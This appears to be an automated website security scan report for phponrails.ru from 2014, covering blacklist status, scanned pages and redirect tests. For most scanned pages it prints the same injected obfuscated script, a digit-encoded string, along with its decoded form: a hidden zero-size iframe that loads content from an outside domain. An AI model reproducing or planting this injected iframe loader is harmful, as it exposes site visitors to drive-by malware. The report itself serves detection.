Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=phponrails.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://phponrails.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 22:24:26 GMT Location: http://www.phponrails.ru/ Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.phponrails.ru/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.phponrails.ru/ | 200 OK Content-Length: 23841 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/feed:http://www.phponrails.ru/?feed=rss2 | 200 OK Content-Length: 1557 Content-Type: text/xml | clean |
http://www.phponrails.ru/test404page.js | 200 OK Content-Length: 23841 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?cat=40 | 200 OK Content-Length: 36218 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?p=79 | 200 OK Content-Length: 29715 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?author=1 | 200 OK Content-Length: 29018 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?p=469 | 200 OK Content-Length: 22423 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?cat=1 | 200 OK Content-Length: 29030 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?tag=mobile | 200 OK Content-Length: 28662 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?p=403 | 200 OK Content-Length: 23783 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?cat=4 | 200 OK Content-Length: 23968 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?p=5 | 200 OK Content-Length: 22624 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?cat=8 | 200 OK Content-Length: 88805 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?p=55 | 200 OK Content-Length: 40707 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
| ||
http://www.phponrails.ru/?cat=19 | 200 OK Content-Length: 98989 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: phponrails.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 22:24:26 GMT
Location: http://www.phponrails.ru/
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.phponrails.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: phponrails.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 22:24:26 GMT
Location: http://www.phponrails.ru/
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.phponrails.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: phponrails.ru
Referer: http://www.google.com/search?q=phponrails.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: phponrails.ru
Referer: http://www.google.com/search?q=phponrails.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.